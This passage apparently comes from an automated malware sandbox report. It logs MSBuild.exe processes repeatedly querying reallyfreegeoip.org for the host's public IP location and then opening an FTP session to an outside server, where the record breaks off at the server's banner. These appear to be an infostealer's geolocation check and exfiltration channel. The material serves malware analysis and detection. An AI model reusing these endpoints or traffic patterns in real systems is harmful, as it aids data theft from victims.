2024-11-08 15:15:36 UTC	1213	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:35 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31650 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOOaN6VF26Pk1loL2hz7EO5YKvbMOoKLXsWSStOLxuXQZNykPzI7aYXctARW3THPcNhBF5ENQcIiTkjVGvho0icB9%2BqlVo9BU3Ig2EWPRovmARP8Nwr2ty1Gmok6JJKOdpyJQamh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684f599af47ac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1991&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1542887&cwnd=251&unsent_bytes=0&cid=fafef5d8300e48ce&ts=149&x=0"
2024-11-08 15:15:36 UTC	156	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
2024-11-08 15:15:36 UTC	203	IN	Data Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49778	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:36 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:36 UTC	1217	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:36 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31651 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GR8WDFhjUu3jrWJC3OkvitCdHBmlP9lWhv53agJ7%2F0bRDPPKztXhffEAfeJ8pqJ%2FO%2FfmQDQSgASTWORF1Lcf5k5mTR7mS8gOQJiHYeMxdZtVy9oYN4LQPBNLOeAV5BfIuYsJVG2o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684f8cf8d2839-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2238&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1274087&cwnd=238&unsent_bytes=0&cid=3520205b608aa137&ts=180&x=0"
2024-11-08 15:15:36 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-08 15:15:36 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49786	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:37 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:37 UTC	1223	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:37 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31652 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tWcW6%2B%2FD46I9UPauungySA5m3107GnUFJDHII5dn8JzQTf0kb4wC61yfQhpEe%2BHXXcERzR%2BY%2B5xBW8x0X3F7pQGTFknwGB6AUsPURzi7gBKmdM2r70YtsDauKc7W%2FsBELpBZRA1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df684ff6cf4e766-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1405&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1991746&cwnd=239&unsent_bytes=0&cid=879a3848f148e005&ts=155&x=0"
2024-11-08 15:15:37 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-08 15:15:37 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49788	188.114.96.3	443	5892	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:37 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:37 UTC	1225	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:37 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31652 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HM9nw1Ysfdwa%2B28H8R4cg2pro2DIYB%2FQLPs5fdqzY%2FluNfFda3ZJLOCmanF%2FFLL0mxv8VAz8TWf9gVbkpyU%2BVz%2Bs6HWk3Oh%2BjQkxmdSWVpGfMXlNeAue2l5VIOPPpvoNas4grDn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df685019b96ea9c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2177443&cwnd=225&unsent_bytes=0&cid=aedbf6036ab44af6&ts=153&x=0"
2024-11-08 15:15:37 UTC	144	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regi
2024-11-08 15:15:37 UTC	215	IN	Data Raw: 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: onName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49800	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:38 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:39 UTC	1221	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:38 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31653 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUe%2BvvooG6q%2BoGYMInTtpaaSTVmsK5mTwuvlr2YD91yetPfKekIrerXaupNsKz%2BZHRNRFhQt%2BosaintdD3W2NGkBj9KFvKus8H1GY6%2FkY36Ltrr8jeNykRDaSug2RhIEl1y6m00j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df685086c180be8-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1184942&cwnd=251&unsent_bytes=0&cid=216d0cf8ce5d2921&ts=169&x=0"
2024-11-08 15:15:39 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-08 15:15:39 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49810	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:40 UTC	87	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-08 15:15:40 UTC	1225	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:40 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31655 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CysdOL8diUnXIx2yCVxhoAuvDHPFkJoB8j%2FC%2FIuyt0cc08jBeHbKsEztJsFMwKrIPRpD2hsXgSv4qGGiUvRMDSpeRhUv%2FQZ0ziH6yQT9%2BO0hcK%2ByBZD0TGmUvEahfWBnk%2BuR%2FxIZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df685115b894751-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1068&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2329847&cwnd=251&unsent_bytes=0&cid=f92c2f21ed633ad2&ts=163&x=0"
2024-11-08 15:15:40 UTC	144	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regi
2024-11-08 15:15:40 UTC	215	IN	Data Raw: 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: onName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49822	188.114.96.3	443	6056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 15:15:41 UTC	63	OUT	GET /xml/173.254.250.90 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-08 15:15:41 UTC	1223	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 15:15:41 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369 x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 31656 Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Btd1zah9AB7PHjXa8t6aoX58n%2BuSXEAC3y5kO7s7YaPyaZzrW%2FxEQk%2BV4XXsY5jmpps6EOVHWy0wL9Q30SxHzlVG9LSQF4T4boCG%2BDSlAbLV4yYATgDR%2FHOs1CkaEDKdCUN48q0R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df6851a5f9e8d27-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1405&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1916611&cwnd=250&unsent_bytes=0&cid=ac52d46ba49c04b1&ts=159&x=0"
2024-11-08 15:15:41 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-08 15:15:41 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 8, 2024 16:15:43.709301949 CET	21	49833	50.31.176.103	192.168.2.10	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 